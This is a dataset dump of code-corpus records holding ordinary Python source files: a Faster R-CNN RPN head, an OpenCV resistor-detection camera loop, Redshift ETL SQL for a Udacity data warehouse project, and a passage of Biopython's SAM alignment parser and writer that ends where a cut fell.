blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
44c52c00ce7f7050f6e5be57b23b40089305b112
|
662c9b1dd64fc87a17e62ccab8a1b3b3f58604e8
|
/Reference Code/lib/modeling/rpn_heads_panet.py
|
8e36ec0d7637b94bb760f8316be5600438387de1
|
[
"MIT"
] |
permissive
|
lixiang95/Amodal-Instance-Segmentation-through-KINS-Dataset
|
004daf92dc5a16ff0902b19102dec8d7299a1884
|
052a548c585ddc60ff5188cfe2345343903daf73
|
refs/heads/master
| 2022-04-05T02:43:25.683524
| 2020-02-16T12:09:42
| 2020-02-16T12:09:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,531
|
py
|
from torch import nn
from torch.nn import init
import torch.nn.functional as F
from core.config import cfg
from modeling.generate_anchors import generate_anchors
from modeling.generate_proposals import GenerateProposalsOp
from modeling.generate_proposal_labels import GenerateProposalLabelsOp
import modeling.FPN_PANET1_v2_2_v1 as FPN
import utils.net as net_utils
# ---------------------------------------------------------------------------- #
# RPN and Faster R-CNN outputs and losses
# ---------------------------------------------------------------------------- #
def generic_rpn_outputs(dim_in, spatial_scale_in):
"""Add RPN outputs (objectness classification and bounding box regression)
to an RPN model. Abstracts away the use of FPN.
"""
if cfg.FPN.FPN_ON:
# Delegate to the FPN module
return FPN.fpn_rpn_outputs(dim_in, spatial_scale_in)
else:
# Not using FPN, add RPN to a single scale
return single_scale_rpn_outputs(dim_in, spatial_scale_in)
def generic_rpn_losses(*inputs, **kwargs):
"""Add RPN losses. Abstracts away the use of FPN."""
if cfg.FPN.FPN_ON:
return FPN.fpn_rpn_losses(*inputs, **kwargs)
else:
return single_scale_rpn_losses(*inputs, **kwargs)
class single_scale_rpn_outputs(nn.Module):
"""Add RPN outputs to a single scale model (i.e., no FPN)."""
def __init__(self, dim_in, spatial_scale):
super().__init__()
self.dim_in = dim_in
self.dim_out = dim_in if cfg.RPN.OUT_DIM_AS_IN_DIM else cfg.RPN.OUT_DIM
anchors = generate_anchors(
stride=1. / spatial_scale,
sizes=cfg.RPN.SIZES,
aspect_ratios=cfg.RPN.ASPECT_RATIOS)
num_anchors = anchors.shape[0]
# RPN hidden representation
self.RPN_conv = nn.Conv2d(self.dim_in, self.dim_out, 3, 1, 1)
# Proposal classification scores
self.n_score_out = num_anchors * 2 if cfg.RPN.CLS_ACTIVATION == 'softmax' \
else num_anchors
self.RPN_cls_score = nn.Conv2d(self.dim_out, self.n_score_out, 1, 1, 0)
# Proposal bbox regression deltas
self.RPN_bbox_pred = nn.Conv2d(self.dim_out, num_anchors * 4, 1, 1, 0)
self.RPN_GenerateProposals = GenerateProposalsOp(anchors, spatial_scale)
self.RPN_GenerateProposalLabels = GenerateProposalLabelsOp()
self._init_weights()
def _init_weights(self):
init.normal_(self.RPN_conv.weight, std=0.01)
init.constant_(self.RPN_conv.bias, 0)
init.normal_(self.RPN_cls_score.weight, std=0.01)
init.constant_(self.RPN_cls_score.bias, 0)
init.normal_(self.RPN_bbox_pred.weight, std=0.01)
init.constant_(self.RPN_bbox_pred.bias, 0)
def detectron_weight_mapping(self):
detectron_weight_mapping = {
'RPN_conv.weight': 'conv_rpn_w',
'RPN_conv.bias': 'conv_rpn_b',
'RPN_cls_score.weight': 'rpn_cls_logits_w',
'RPN_cls_score.bias': 'rpn_cls_logits_b',
'RPN_bbox_pred.weight': 'rpn_bbox_pred_w',
'RPN_bbox_pred.bias': 'rpn_bbox_pred_b'
}
orphan_in_detectron = []
return detectron_weight_mapping, orphan_in_detectron
def forward(self, x, im_info, roidb=None):
"""
x: feature maps from the backbone network. (Variable)
im_info: (CPU Variable)
roidb: (list of ndarray)
"""
rpn_conv = F.relu(self.RPN_conv(x), inplace=True)
rpn_cls_logits = self.RPN_cls_score(rpn_conv)
rpn_bbox_pred = self.RPN_bbox_pred(rpn_conv)
return_dict = {
'rpn_cls_logits': rpn_cls_logits, 'rpn_bbox_pred': rpn_bbox_pred}
if not self.training or cfg.MODEL.FASTER_RCNN:
# Proposals are needed during:
# 1) inference (== not model.train) for RPN only and Faster R-CNN
# OR
# 2) training for Faster R-CNN
# Otherwise (== training for RPN only), proposals are not needed
if cfg.RPN.CLS_ACTIVATION == 'softmax':
B, C, H, W = rpn_cls_logits.size()
rpn_cls_prob = F.softmax(
rpn_cls_logits.view(B, 2, C // 2, H, W), dim=1)
rpn_cls_prob = rpn_cls_prob[:, 1].squeeze(dim=1)
else:
rpn_cls_prob = F.sigmoid(rpn_cls_logits)
rpn_rois, rpn_rois_prob = self.RPN_GenerateProposals(
rpn_cls_prob, rpn_bbox_pred, im_info)
return_dict['rpn_rois'] = rpn_rois
return_dict['rpn_roi_probs'] = rpn_rois_prob
if cfg.MODEL.FASTER_RCNN :
if self.training:
# Add op that generates training labels for in-network RPN proposals
blobs_out = self.RPN_GenerateProposalLabels(rpn_rois, roidb, im_info)
return_dict.update(blobs_out)
else:
# Alias rois to rpn_rois for inference
return_dict['rois'] = return_dict['rpn_rois']
return return_dict
def single_scale_rpn_losses(
rpn_cls_logits, rpn_bbox_pred,
rpn_labels_int32_wide, rpn_bbox_targets_wide,
rpn_bbox_inside_weights_wide, rpn_bbox_outside_weights_wide):
"""Add losses for a single scale RPN model (i.e., no FPN)."""
h, w = rpn_cls_logits.shape[2:]
rpn_labels_int32 = rpn_labels_int32_wide[:, :, :h, :w] # -1 means ignore
h, w = rpn_bbox_pred.shape[2:]
rpn_bbox_targets = rpn_bbox_targets_wide[:, :, :h, :w]
rpn_bbox_inside_weights = rpn_bbox_inside_weights_wide[:, :, :h, :w]
rpn_bbox_outside_weights = rpn_bbox_outside_weights_wide[:, :, :h, :w]
if cfg.RPN.CLS_ACTIVATION == 'softmax':
B, C, H, W = rpn_cls_logits.size()
rpn_cls_logits = rpn_cls_logits.view(
B, 2, C // 2, H, W).permute(0, 2, 3, 4, 1).contiguous().view(-1, 2)
rpn_labels_int32 = rpn_labels_int32.contiguous().view(-1).long()
# the loss is averaged over non-ignored targets
loss_rpn_cls = F.cross_entropy(
rpn_cls_logits, rpn_labels_int32, ignore_index=-1)
else:
weight = (rpn_labels_int32 >= 0).float()
loss_rpn_cls = F.binary_cross_entropy_with_logits(
rpn_cls_logits, rpn_labels_int32.float(), weight, size_average=False)
loss_rpn_cls /= weight.sum()
loss_rpn_bbox = net_utils.smooth_l1_loss(
rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights, rpn_bbox_outside_weights,
beta=1/9)
return loss_rpn_cls, loss_rpn_bbox
|
[
"qqlu1992@gmail.com"
] |
qqlu1992@gmail.com
|
575f16350068085904d3e88d041788aa5d2ad0bc
|
c6b46e402eea7769dd5c7e5232e677976ddd7482
|
/main.py
|
9b7acb37f2a0ee60bbe8a8e955537c68e2642ddb
|
[
"MIT"
] |
permissive
|
alhazmy13/ResistorsOpenCV
|
cbdab3b2c3c9736452e7a97f0f2c16e3b630a39d
|
95237e6014ef51a4a2eb3f049f9844f535090ecf
|
refs/heads/master
| 2023-02-14T02:24:55.266688
| 2020-10-25T12:16:52
| 2020-10-25T12:16:52
| 307,081,563
| 3
| 0
| null | 2020-10-25T12:04:24
| 2020-10-25T11:14:44
|
Python
|
UTF-8
|
Python
| false
| false
| 305
|
py
|
import cv2
from vision import Vision
vision = Vision()
if __name__ == "__main__":
while not (cv2.waitKey(1) == ord('q')):
_, live_img = vision.get_camera()
vision.print_result(live_img=live_img)
cv2.imshow("Frame", live_img)
vision.release()
cv2.destroyAllWindows()
|
[
"me@alhazmy13.net"
] |
me@alhazmy13.net
|
ab1ae3d0b32da3e9f20bd3fb9d1b81d217bd46eb
|
02d0b4180184eb5598b3f9c7d2c34540562e74ea
|
/ND03 - Data Warehouse/sql_queries.py
|
07cf68f9a46e83fc8bf42ff754f8ffebd3afe15c
|
[] |
no_license
|
sketha33/Udacity_DE_NanoDegree
|
8d6e0438686cd61c925c39f13c74257ea6bd9edc
|
b0d310821a4ea98afd1c7b5ca9f06b0cc1ca2c5f
|
refs/heads/main
| 2022-12-29T19:42:33.974834
| 2020-10-18T20:22:23
| 2020-10-18T20:22:23
| 303,818,151
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,499
|
py
|
import configparser
# CONFIG
config = configparser.ConfigParser()
config.read('dwh.cfg')
# Truncate TABLES
staging_events_table_trun = "TRUNCATE TABLE staging_events"
staging_songs_table_trun = "TRUNCATE TABLE staging_songs"
songplay_table_trun = "TRUNCATE TABLE songplay"
user_table_trun = "TRUNCATE TABLE users"
song_table_trun = "TRUNCATE TABLE songs"
artist_table_trun = "TRUNCATE TABLE artists"
time_table_trun = "TRUNCATE TABLE time"
# DROP TABLES
staging_events_table_drop = "DROP TABLE staging_events"
staging_songs_table_drop = "DROP TABLE staging_songs"
songplay_table_drop = "DROP TABLE songplay"
user_table_drop = "DROP TABLE users"
song_table_drop = "DROP TABLE songs"
artist_table_drop = "DROP TABLE artists"
time_table_drop = "DROP TABLE time"
# CREATE TABLES
staging_events_table_create = (""" CREATE TABLE IF NOT EXISTS staging_events ( artist VARCHAR, \
auth VARCHAR, \
firstName VARCHAR, \
gender VARCHAR, \
itemInSession VARCHAR, \
lastName VARCHAR, \
length FLOAT, \
level VARCHAR, \
location VARCHAR, \
method VARCHAR, \
page VARCHAR, \
registration VARCHAR, \
sessionId VARCHAR, \
song VARCHAR, \
status VARCHAR, \
ts VARCHAR, \
userAgent VARCHAR, \
userId VARCHAR ); """)
staging_songs_table_create = (""" CREATE TABLE IF NOT EXISTS staging_songs (num_songs INTEGER, \
artist_id VARCHAR, \
artist_latitude VARCHAR, \
artist_longitude VARCHAR, \
artist_location VARCHAR, \
artist_name VARCHAR, \
song_id VARCHAR, \
title VARCHAR, \
duration FLOAT, \
year INTEGER); """)
songplay_table_create = (""" CREATE TABLE IF NOT EXISTS songplay (songplay_id INTEGER IDENTITY(0,1) NOT NULL PRIMARY KEY, \
start_time DATE, \
user_id VARCHAR NOT NULL, \
level VARCHAR, \
song_id VARCHAR NOT NULL, \
artist_id VARCHAR NOT NULL, \
session_id VARCHAR, \
location VARCHAR, \
user_agent VARCHAR); """)
user_table_create = (""" CREATE TABLE IF NOT EXISTS users (user_id VARCHAR NOT NULL PRIMARY KEY, \
first_name VARCHAR, \
last_name VARCHAR, \
gender VARCHAR, \
level VARCHAR); """)
song_table_create = (""" CREATE TABLE IF NOT EXISTS songs (song_id VARCHAR NOT NULL PRIMARY KEY, \
title VARCHAR, \
artist_id VARCHAR NOT NULL, \
year VARCHAR, \
duration BIGINT ); """)
artist_table_create = (""" CREATE TABLE IF NOT EXISTS artists (artist_id VARCHAR NOT NULL PRIMARY KEY, \
name VARCHAR, \
location VARCHAR, \
latitude VARCHAR, \
longitude VARCHAR) ; """)
time_table_create = (""" CREATE TABLE IF NOT EXISTS time (start_time TIMESTAMP NOT NULL PRIMARY KEY , \
hour VARCHAR, \
day VARCHAR, \
week VARCHAR, \
month VARCHAR, \
year VARCHAR, \
weekday VARCHAR); """)
# STAGING TABLES
staging_events_copy = (""" copy staging_events from {} \
credentials 'aws_iam_role={}'\
json {} \
region 'us-west-2';""").format(config.get("S3", "LOG_DATA"), config.get("IAM_ROLE", "ARN"),config.get("S3", "LOG_JSONPATH"))
staging_songs_copy = (""" copy staging_songs from {} \
credentials 'aws_iam_role={}' \
json 'auto' \
region 'us-west-2';""").format(config.get("S3", "SONG_DATA"), config.get("IAM_ROLE", "ARN"))
# Final Tables
songplay_table_insert = (""" INSERT INTO songplay (start_time, \
user_id, \
level, \
song_id, \
artist_id, \
session_id, \
location, \
user_agent) \
(SELECT DISTINCT TIMESTAMP 'epoch' + ts/1000 *INTERVAL '1 second', \
userId, \
level, \
song_id, \
artist_id, \
sessionId, \
location, \
useragent \
FROM staging_songs, staging_events \
WHERE title = song \
AND artist = artist_name
AND page = 'NextSong' ) """)
user_table_insert = (""" INSERT INTO users (user_id, \
first_name, \
last_name, \
gender, \
level) \
(SELECT DISTINCT userId, \
firstName, \
lastname, \
gender, \
level \
FROM staging_events
WHERE page = 'NextSong') """)
song_table_insert = (""" INSERT INTO songs(song_id, \
title, \
artist_id, \
year, \
duration) \
(SELECT DISTINCT song_id, \
title, \
artist_id, \
year, \
duration \
FROM staging_songs) """)
artist_table_insert = (""" INSERT INTO artists (artist_id, \
name, \
location, \
latitude, \
longitude ) \
(SELECT DISTINCT artist_id, \
artist_name, \
artist_location, \
artist_latitude, \
artist_longitude \
FROM staging_songs )
""")
time_table_insert = (""" INSERT INTO time (start_time,hour,day,week,month,year,weekday) \
( SELECT DISTINCT(start_time) AS start_time, \
EXTRACT(hour FROM start_time) AS hour, \
EXTRACT(day FROM start_time) AS day, \
EXTRACT(week FROM start_time) AS week, \
EXTRACT(month FROM start_time) AS month, \
EXTRACT(year FROM start_time) AS year, \
EXTRACT(dayofweek FROM start_time) as weekday \
FROM songplay);
""")
# QUERY LISTS
create_table_queries = [staging_events_table_create, \
staging_songs_table_create, \
songplay_table_create, \
user_table_create, \
song_table_create, \
artist_table_create, \
time_table_create]
drop_table_queries = [staging_events_table_drop, \
staging_songs_table_drop, \
songplay_table_drop, \
user_table_drop, \
song_table_drop, \
artist_table_drop, \
time_table_drop]
copy_table_queries = [staging_events_copy, \
staging_songs_copy]
insert_table_queries = [songplay_table_insert, \
user_table_insert, \
song_table_insert, \
artist_table_insert, \
time_table_insert]
trunc_table_queries = [staging_events_table_trun, \
staging_songs_table_trun, \
songplay_table_trun, \
user_table_trun, \
song_table_trun, \
artist_table_trun, \
time_table_trun]
|
[
"noreply@github.com"
] |
sketha33.noreply@github.com
|
05da5fd12fbafb2386db3b2f9980d4c9d9063e02
|
5d34689e0fe3dea453416bd7849b8028e1a0b3e4
|
/Bio/Align/sam.py
|
522ded168bad2599cfc7bd7e1c5d2cc887ca7f9c
|
[
"BSD-3-Clause",
"LicenseRef-scancode-biopython"
] |
permissive
|
fabianegli/biopython
|
2996d4209933b15e42db7e95f4a36d84a4df0ebd
|
06a96c0311ec7a8b714adff9f8b6d3414ecc70a0
|
refs/heads/master
| 2022-09-04T15:33:07.733522
| 2022-08-09T10:18:45
| 2022-08-09T10:18:45
| 167,009,089
| 0
| 0
|
NOASSERTION
| 2022-06-15T13:27:43
| 2019-01-22T14:34:52
|
Python
|
UTF-8
|
Python
| false
| false
| 30,190
|
py
|
# Copyright 2022 by Michiel de Hoon. All rights reserved.
#
# This file is part of the Biopython distribution and governed by your
# choice of the "Biopython License Agreement" or the "BSD 3-Clause License".
# Please see the LICENSE file that should have been included as part of this
# package.
"""Bio.Align support for the "sam" pairwise alignment format.
The Sequence Alignment/Map (SAM) format, created by Heng Li and Richard Durbin
at the Wellcome Trust Sanger Institute, stores a series of alignments to the
genome in a single file. Typically they are used for next-generation sequencing
data. SAM files store the alignment positions for mapped sequences, and may
also store the aligned sequences and other information associated with the
sequence.
See http://www.htslib.org/ for more information.
You are expected to use this module via the Bio.Align functions.
Coordinates in the SAM format are defined in terms of one-based start
positions; the parser converts these to zero-based coordinates to be consistent
with Python and other alignment formats.
"""
from itertools import chain
import copy
try:
import numpy
except ImportError:
from Bio import MissingPythonDependencyError
raise MissingPythonDependencyError(
"Please install numpy if you want to use Bio.Align. "
"See http://www.numpy.org/"
) from None
from Bio.Align import Alignment
from Bio.Align import interfaces
from Bio.Seq import Seq, reverse_complement, UndefinedSequenceError
from Bio.SeqRecord import SeqRecord
from Bio import BiopythonExperimentalWarning
import warnings
warnings.warn(
"Bio.Align.sam is an experimental module which may undergo "
"significant changes prior to its future official release.",
BiopythonExperimentalWarning,
)
class AlignmentWriter(interfaces.AlignmentWriter):
"""Alignment file writer for the Sequence Alignment/Map (SAM) file format."""
def __init__(self, target, md=False):
"""Create an AlignmentWriter object.
Arguments:
- md - If True, calculate the MD tag from the alignment and include it
in the output.
If False (default), do not include the MD tag in the output.
"""
super().__init__(target, mode="w")
self.md = md
def write_header(self, alignments):
"""Write the SAM header."""
try:
metadata = alignments.metadata
except AttributeError:
metadata = {}
try:
targets = alignments.targets
except AttributeError:
targets = {}
values = metadata.get("HD")
if values is not None:
# if HD is present, then VN is required and must come first
fields = ["@HD", "VN:%s" % values["VN"]]
for key, value in values.items():
if key == "VN":
continue
fields.append("%s:%s" % (key, value))
line = "\t".join(fields) + "\n"
self.stream.write(line)
for rname, record in targets.items():
assert rname == record.id
fields = ["@SQ"]
fields.append("SN:%s" % rname)
length = len(record.seq)
fields.append("LN:%d" % length)
for key, value in record.annotations.items():
if key == "alternate_locus":
fields.append("AH:%s" % value)
elif key == "names":
fields.append("AN:%s" % ",".join(value))
elif key == "assembly":
fields.append("AS:%s" % value)
elif key == "MD5":
fields.append("M5:%s" % value)
elif key == "species":
fields.append("SP:%s" % value)
elif key == "topology":
assert value in ("linear", "circular")
fields.append("PP:%s" % value)
elif key == "URI":
fields.append("UR:%s" % value)
else:
fields.append("%s:%s" % (key[:2], value))
try:
description = record.description
except AttributeError:
pass
else:
if description != "<unknown description>":
fields.append("DS:%s" % description)
line = "\t".join(fields) + "\n"
self.stream.write(line)
for tag, rows in metadata.items():
if tag == "HD": # already written
continue
for row in rows:
fields = ["@" + tag]
for key, value in row.items():
fields.append("%s:%s" % (key, value))
line = "\t".join(fields) + "\n"
self.stream.write(line)
def format_alignment(self, alignment, md=None):
"""Return a string with a single alignment formatted as one SAM line."""
if not isinstance(alignment, Alignment):
raise TypeError("Expected an Alignment object")
coordinates = alignment.coordinates.transpose()
target, query = alignment.sequences
hard_clip_left = None
hard_clip_right = None
try:
qName = query.id
except AttributeError:
qName = "query"
qual = "*"
else:
try:
hard_clip_left = query.annotations["hard_clip_left"]
except (AttributeError, KeyError):
pass
try:
hard_clip_right = query.annotations["hard_clip_right"]
except (AttributeError, KeyError):
pass
try:
qual = query.letter_annotations["phred_quality"]
except (AttributeError, KeyError):
qual = "*"
query = query.seq
qSize = len(query)
try:
rName = target.id
except AttributeError:
rName = "target"
else:
target = target.seq
tSize = len(target)
if coordinates[0, 1] < coordinates[-1, 1]: # mapped to forward strand
flag = 0
else: # mapped to reverse strand
flag = 16
query = reverse_complement(query, inplace=False)
coordinates = numpy.array(coordinates)
coordinates[:, 1] = qSize - coordinates[:, 1]
hard_clip_left, hard_clip_right = hard_clip_right, hard_clip_left
try:
query = bytes(query)
except TypeError: # string
pass
except UndefinedSequenceError:
query = "*"
else:
query = str(query, "ASCII")
tStart, qStart = coordinates[0, :]
pos = tStart
cigar = ""
if hard_clip_left is not None:
cigar += "%dH" % hard_clip_left
if qStart > 0:
cigar += "%dS" % qStart
try:
operations = alignment.operations
except AttributeError:
operations = None
for tEnd, qEnd in coordinates[1:, :]:
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
cigar += "%dI" % qCount # insertion to the reference
qStart = qEnd
elif qCount == 0:
cigar += "%dD" % tCount # deletion from the reference
tStart = tEnd
else:
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
cigar += "%dM" % tCount
tStart = tEnd
qStart = qEnd
else:
for operation, (tEnd, qEnd) in zip(operations, coordinates[1:, :]):
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
assert operation == ord("I")
cigar += "%dI" % qCount # insertion to the reference
qStart = qEnd
elif qCount == 0:
if operation == ord("N"):
cigar += "%dN" % tCount # skipped region from the reference
elif operation == ord("D"):
cigar += "%dD" % tCount # deletion from the reference
else:
raise ValueError(f"Unexpected operation {operation}")
tStart = tEnd
else:
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
assert operation == ord("M")
cigar += "%dM" % tCount
tStart = tEnd
qStart = qEnd
if qEnd < qSize:
cigar += "%dS" % (qSize - qEnd)
if hard_clip_right is not None:
cigar += "%dH" % hard_clip_right
try:
mapq = alignment.mapq
except AttributeError:
mapq = 255 # not available
rNext = "*"
pNext = 0
tLen = 0
fields = [
qName,
str(flag),
rName,
str(pos + 1), # 1-based coordinates
str(mapq),
cigar,
rNext,
str(pNext),
str(tLen),
query,
qual,
]
if md is None:
md = self.md
if md is True:
if query == "*":
raise ValueError("requested MD tag with undefined sequence")
# calculate the MD tag from the alignment coordinates and sequences
tStart, qStart = coordinates[0, :]
number = 0
md = ""
if operations is None:
for tEnd, qEnd in coordinates[1:, :]:
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
# insertion to the reference
qStart = qEnd
elif qCount == 0:
length = tCount
if True:
# deletion from the reference
if number:
md += str(number)
number = 0
md += "^" + target[tStart:tEnd]
tStart = tEnd
else:
# alignment match
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
for tc, qc in zip(target[tStart:tEnd], query[qStart:qEnd]):
if tc == qc:
number += 1
else:
md += str(number) + tc
number = 0
tStart = tEnd
qStart = qEnd
if number:
md += str(number)
else:
for operation, (tEnd, qEnd) in zip(operations, coordinates[1:, :]):
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
# insertion to the reference
qStart = qEnd
elif qCount == 0:
length = tCount
if operation != ord("N"):
# deletion from the reference
if number:
md += str(number)
number = 0
md += "^" + target[tStart:tEnd]
tStart = tEnd
else:
# alignment match
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
for tc, qc in zip(target[tStart:tEnd], query[qStart:qEnd]):
if tc == qc:
number += 1
else:
md += str(number) + tc
number = 0
tStart = tEnd
qStart = qEnd
if number:
md += str(number)
field = "MD:Z:%s" % md
fields.append(field)
try:
score = alignment.score
except AttributeError:
pass
else:
field = "AS:i:%d" % int(round(score))
fields.append(field)
try:
annotations = alignment.annotations
except AttributeError:
pass
else:
for key, value in annotations.items():
if isinstance(value, int):
datatype = "i"
value = str(value)
elif isinstance(value, float):
datatype = "f"
value = str(value)
elif isinstance(value, str):
if len(value) == 1:
datatype = "A"
else:
datatype = "Z"
elif isinstance(value, bytes):
datatype = "H"
value = "".join(map(str, value))
elif isinstance(value, numpy.array):
datatype = "B"
if numpy.issubdtype(value.dtype, numpy.integer):
letter = "i"
elif numpy.issubdtype(value.dtype, float):
letter = "f"
else:
raise ValueError(
f"Array of incompatible data type {value.dtype} in annotation '{key}'"
)
value = ",".join(map(str, value))
field = f"{key}:{datatype}:{value}"
fields.append(field)
line = "\t".join(fields) + "\n"
return line
class AlignmentIterator(interfaces.AlignmentIterator):
"""Alignment iterator for Sequence Alignment/Map (SAM) files.
Each line in the file contains one genomic alignment, which are loaded
and returned incrementally. The following columns are stored as attributes
of the alignment:
- flag: The FLAG combination of bitwise flags;
- mapq: Mapping Quality (only stored if available)
- rnext: Reference sequence name of the primary alignment of the next read
in the alignment (only stored if available)
- pnext: Zero-based position of the primary alignment of the next read in
the template (only stored if available)
- tlen: signed observed template length (only stored if available)
Other information associated with the alignment by its tags are stored in
the annotations attribute of each alignment.
Any hard clipping (clipped sequences not present in the query sequence)
are stored as 'hard_clip_left' and 'hard_clip_right' in the annotations
dictionary attribute of the query sequence record.
The sequence quality, if available, is stored as 'phred_quality' in the
letter_annotations dictionary attribute of the query sequence record.
"""
def __init__(self, source):
"""Create an AlignmentIterator object.
Arguments:
- source - input data or file name
"""
super().__init__(source, mode="t", fmt="SAM")
def _read_header(self, stream):
self.metadata = {}
self.targets = {}
for line in stream:
if not line.startswith("@"):
self._line = line
break
fields = line[1:].strip().split("\t")
tag = fields[0]
values = {}
if tag == "SQ":
annotations = {}
description = None
for field in fields[1:]:
key, value = field.split(":", 1)
assert len(key) == 2
if key == "SN":
rname = value
elif key == "LN":
length = int(value)
elif key == "AH":
annotations["alternate_locus"] = value
elif key == "AN":
annotations["names"] = value.split(",")
elif key == "AS":
annotations["assembly"] = value
elif key == "DS":
description = value
elif key == "M5":
annotations["MD5"] = value
elif key == "SP":
annotations["species"] = value
elif key == "TP":
assert value in ("linear", "circular")
annotations["topology"] = value
elif key == "UR":
annotations["URI"] = value
else:
annotations[key] = value
assert rname not in self.targets
sequence = Seq(None, length=length)
record = SeqRecord(sequence, id=rname, annotations=annotations)
if description is not None:
record.description = description
self.targets[rname] = record
else:
for field in fields[1:]:
key, value = field.split(":", 1)
assert len(key) == 2
values[key] = value
if tag == "HD":
self.metadata[tag] = values
else:
if tag not in self.metadata:
self.metadata[tag] = []
self.metadata[tag].append(values)
def _read_next_alignment(self, stream):
try:
line = self._line
except AttributeError:
lines = stream
else:
lines = chain([line], stream)
del self._line
for line in lines:
fields = line.split()
if len(fields) < 11:
raise ValueError(
"line has %d columns; expected at least 11" % len(fields)
)
qname = fields[0]
flag = int(fields[1])
rname = fields[2]
target_pos = int(fields[3]) - 1
mapq = int(fields[4])
cigar = fields[5]
rnext = fields[6]
pnext = int(fields[7]) - 1
tlen = int(fields[8])
query = fields[9]
qual = fields[10]
md = None
score = None
annotations = {}
column_annotations = {}
for field in fields[11:]:
tag, datatype, value = field.split(":", 2)
if tag == "AS":
assert datatype == "i"
score = int(value)
elif tag == "MD":
assert datatype == "Z"
md = value
else:
if datatype == "i":
value = int(value)
elif datatype == "f":
value = float(value)
elif datatype in ("A", "Z"): # string
pass
elif datatype == "H":
n = len(value)
value = bytes(int(value[i : i + 2]) for i in range(0, n, 2))
elif datatype == "B":
letter = value[0]
value = value[1:].split(",")
if letter in "cCsSiI":
dtype = int
elif letter == "f":
dtype = float
else:
raise ValueError(
f"Unknown number type '{letter}' in tag '{field}'"
)
value = numpy.array(value, dtype)
annotations[tag] = value
if flag & 0x10:
strand = "-"
else:
strand = "+"
hard_clip_left = None
hard_clip_right = None
store_operations = False
if flag & 0x4: # unmapped
target = None
coordinates = None
elif md is None:
query_pos = 0
coordinates = [[target_pos, query_pos]]
number = ""
operations = bytearray()
for letter in cigar:
if letter == "M":
# M: alignment match
length = int(number)
target_pos += length
query_pos += length
elif letter in "=X":
# =: sequence match
# X: sequence mismatch
length = int(number)
target_pos += length
query_pos += length
store_operations = True
elif letter == "I":
# I: insertion to the reference
length = int(number)
query_pos += length
elif letter == "S":
# S: soft clipping
length = int(number)
if query_pos == 0:
coordinates[0][1] += length
query_pos += length
number = ""
continue
elif letter == "D":
# D: deletion from the reference
length = int(number)
target_pos += length
elif letter == "N":
# N: skipped region from the reference
length = int(number)
target_pos += length
store_operations = True
elif letter == "H": # hard clipping
if query_pos == 0:
hard_clip_left = int(number)
else:
hard_clip_right = int(number)
number = ""
continue
elif letter == "P": # padding
raise NotImplementedError(
"padding operator is not yet implemented"
)
else:
number += letter
continue
coordinates.append([target_pos, query_pos])
operations.append(ord(letter))
number = ""
target = self.targets.get(rname)
if target is None:
if self.targets:
raise ValueError(f"Found target {rname} missing from header")
target = SeqRecord(None, id=rname)
else:
query_pos = 0
coordinates = [[target_pos, query_pos]]
seq = query
target = ""
starts = [target_pos]
size = 0
sizes = []
number = ""
operations = bytearray()
for letter in cigar:
if letter in "M":
# M: alignment match
length = int(number)
target_pos += length
query_pos += length
target += seq[:length]
seq = seq[length:]
size += length
elif letter in "=X":
# =: sequence match
# X: sequence mismatch
length = int(number)
target_pos += length
query_pos += length
target += seq[:length]
seq = seq[length:]
size += length
store_operations = True
elif letter == "I":
# I: insertion to the reference
length = int(number)
query_pos += length
seq = seq[length:]
elif letter == "S":
# S: soft clipping
length = int(number)
if query_pos == 0:
coordinates[0][1] += length
query_pos += length
seq = seq[length:]
number = ""
continue
elif letter == "D": # deletion from the reference
length = int(number)
target_pos += length
size += length
starts.append(target_pos)
sizes.append(size)
size = 0
elif letter == "N": # skipped region from the reference
length = int(number)
target_pos += length
starts.append(target_pos)
sizes.append(size)
size = 0
store_operations = True
elif letter == "H":
# hard clipping (clipped sequences not present in sequence)
if query_pos == 0:
hard_clip_left = int(number)
else:
hard_clip_right = int(number)
number = ""
continue
elif letter == "P": # padding
raise NotImplementedError(
"padding operator is not yet implemented"
)
else:
number += letter
continue
coordinates.append([target_pos, query_pos])
operations.append(ord(letter))
number = ""
sizes.append(size)
seq = target
target = ""
number = ""
letters = iter(md)
for letter in letters:
if letter in "ACGTNacgtn":
if number:
number = int(number)
target += seq[:number]
seq = seq[number:]
number = ""
target += letter
seq = seq[1:]
elif letter == "^":
if number:
number = int(number)
target += seq[:number]
seq = seq[number:]
number = ""
for letter in letters:
if letter not in "ACGTNacgtn":
break
target += letter
else:
break
number = letter
else:
number += letter
if number:
number = int(number)
target += seq[:number]
seq = target
target = copy.deepcopy(self.targets[rname])
length = len(target.seq)
data = {}
index = 0
for start, size in zip(starts, sizes):
data[start] = seq[index : index + size]
index += size
target.seq = Seq(data, length=length)
if coordinates is not None:
coordinates = numpy.array(coordinates).transpose()
if strand == "-":
coordinates[1, :] = query_pos - coordinates[1, :]
if query == "*":
length = query_pos
sequence = Seq(None, length=length)
else:
sequence = Seq(query)
if not (flag & 0x4): # not unmapped
assert len(query) == query_pos
if strand == "-":
sequence = sequence.reverse_complement()
query = SeqRecord(sequence, id=qname)
